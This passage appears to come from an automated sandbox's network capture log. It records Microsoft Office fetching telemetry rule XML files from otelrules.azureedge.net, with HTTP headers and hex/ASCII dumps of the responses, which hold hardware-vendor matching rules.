                                                  ETag: "0x8DC582BD4C869AE"
                                                  x-ms-request-id: c11b12be-901e-0048-4704-48b800000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083525Z-r1cf579d778z4wflhC1EWRa3h0000000080g000000000aaw
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:25 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  35192.168.2.44980113.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:25 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:25 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:25 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 408
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                  ETag: "0x8DC582BB56D3AFB"
                                                  x-ms-request-id: 75167780-601e-000d-444b-492618000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083525Z-r1cf579d778pftsbhC1EWRa0gn00000002a000000000575b
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:25 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  36192.168.2.44979813.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:25 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:25 UTC494INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:25 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 2980
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                  ETag: "0x8DC582BA80D96A1"
                                                  x-ms-request-id: 63a77e6f-f01e-0052-2825-499224000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083525Z-r1cf579d778z4wflhC1EWRa3h000000007yg000000001nwz
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:25 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  37192.168.2.44980013.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:25 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:25 UTC494INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:25 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 2160
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                  ETag: "0x8DC582BA3B95D81"
                                                  x-ms-request-id: a36b2733-e01e-0051-6f03-4884b2000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083525Z-r1cf579d7788pwqzhC1EWRrpd800000008000000000066wx
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:25 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  38192.168.2.44980613.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:27 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:27 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:27 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 415
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                  ETag: "0x8DC582B9F6F3512"
                                                  x-ms-request-id: cd935607-001e-00ad-029b-49554b000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083527Z-r1cf579d778j4j5fhC1EWR3ge800000001a0000000004u5c
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:27 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  39192.168.2.44980513.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:27 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:27 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:27 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 474
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                  ETag: "0x8DC582B9964B277"
                                                  x-ms-request-id: 27a1a40f-f01e-0096-7d0b-4810ef000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083527Z-r1cf579d778d5zkmhC1EWRk6h800000008e000000000019k
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:27 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  40192.168.2.44980713.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:27 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:27 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:27 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 471
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                  ETag: "0x8DC582BB10C598B"
                                                  x-ms-request-id: 3de6f1c3-b01e-003d-6e01-48d32c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083527Z-r1cf579d778qlpkrhC1EWRpfc800000008k00000000029kh
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:27 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  41192.168.2.44980813.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:27 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:27 UTC491INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:27 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 632
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                  ETag: "0x8DC582BB6E3779E"
                                                  x-ms-request-id: b81bee07-c01e-0046-209b-492db9000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083527Z-r1cf579d778469knhC1EWR2gqc00000000pg0000000001sg
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:27 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  42192.168.2.44979713.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:28 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:29 UTC494INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:28 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 3788
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                  ETag: "0x8DC582BAC2126A6"
                                                  x-ms-request-id: 3fcd35f4-e01e-0052-4b02-48d9df000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083528Z-r1cf579d778d5zkmhC1EWRk6h8000000088g000000003yf9
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:29 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  43192.168.2.44980913.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:29 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:30 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:29 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 467
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                  ETag: "0x8DC582BA6C038BC"
                                                  x-ms-request-id: c4bc35ba-101e-007a-7206-48047e000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083529Z-r1cf579d7789trgthC1EWRkkfc00000008hg0000000032k5
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:30 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  44192.168.2.44981013.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:29 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:30 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:29 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 407
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                  ETag: "0x8DC582BBAD04B7B"
                                                  x-ms-request-id: e3724c3d-001e-0066-1678-49561e000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083529Z-r1cf579d7782v2q5hC1EWRt9bw00000002ng000000001ss7
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-12-09 08:35:30 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  45192.168.2.44981213.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:35:29 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-12-09 08:35:30 UTC470INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:35:29 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 427
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                  ETag: "0x8DC582BA310DA18"
                                                  x-ms-request-id: 682fb484-401e-0083-5904-48075c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241209T083529Z-r1cf579d778qlpkrhC1EWRpfc800000008h00000000036fn
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
